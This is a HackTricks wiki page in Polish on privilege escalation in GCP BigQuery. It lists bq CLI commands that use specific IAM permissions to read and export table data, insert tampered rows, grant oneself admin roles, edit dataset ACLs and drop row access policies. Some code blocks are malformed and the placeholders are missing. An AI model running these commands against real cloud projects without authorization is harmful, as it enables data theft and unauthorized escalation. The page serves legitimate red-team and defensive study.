GCP - BigQuery Privesc

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Sprawdź subscription plans!

Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.

Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.

BigQuery

Aby uzyskać więcej informacji o BigQuery sprawdź:

GCP - Bigquery Enum

Czytając informacje przechowywane w tabeli BigQuery, można znaleźć wrażliwe informacje. Aby uzyskać dostęp do tych danych potrzebne są uprawnienia bigquery.tables.get, bigquery.jobs.create i bigquery.tables.getData:

Odczyt danych tabeli BigQuery

```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

Eksport danych

To kolejny sposób na dostęp do danych. Wyeksportuj je do bucketu Cloud Storage i pobierz pliki z informacjami.
Aby wykonać tę operację potrzebne są następujące uprawnienia: bigquery.tables.export, bigquery.jobs.create i storage.objects.create.

Eksport tabeli BigQuery do Cloud Storage

```bash bq extract .

"gs:///table*.csv" ```

Wstawianie danych

Może być możliwe wprowadzenie pewnych zaufanych danych do tabeli Bigquery, aby wykorzystać lukę w jakimś innym miejscu. Można to łatwo zrobić za pomocą uprawnień bigquery.tables.get, bigquery.tables.updateData i bigquery.jobs.create:

Wstawianie danych do tabeli BigQuery

```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

Atakujący mógłby nadużyć tego uprawnienia, aby **przyznać sobie dodatkowe uprawnienia** do datasetu BigQuery:

<details>
<summary>Ustaw politykę IAM na BigQuery dataset</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Tylko to uprawnienie pozwala zaktualizować swój dostęp do zbioru danych BigQuery poprzez modyfikację ACLs, które wskazują, kto może uzyskać do niego dostęp:

Aktualizacja ACLs zbioru danych BigQuery

```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.

```

`bigquery.tables.setIamPolicy`

Atakujący mógłby wykorzystać to uprawnienie, aby przyznać sobie dodatkowe uprawnienia do tabeli BigQuery:

Ustaw politykę IAM dla tabeli BigQuery

```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Według dokumentacji, z wymienionymi uprawnieniami można **zaktualizować politykę dostępu do wierszy.**\
Jednak **używając CLI `bq`** potrzebujesz dodatkowo: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Utwórz lub zastąp politykę dostępu do wierszy</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Można znaleźć filter ID w wyniku enumeracji row policies. Przykład:

Wyświetl listę row access policies

```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

Jeśli masz uprawnienie **`bigquery.rowAccessPolicies.delete`** zamiast `bigquery.rowAccessPolicies.update`, możesz też po prostu usunąć politykę:

<details>
<summary>Usuń row access policies</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

Inna potencjalna opcja umożliwiająca bypass row access policies to po prostu zmienić wartość ograniczonych danych. Jeśli widzisz je tylko gdy term jest Cfba, zmodyfikuj wszystkie rekordy tabeli, aby term = "Cfba". Jednakże uniemożliwia to bigquery.

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Sprawdź subscription plans!

Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.

Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.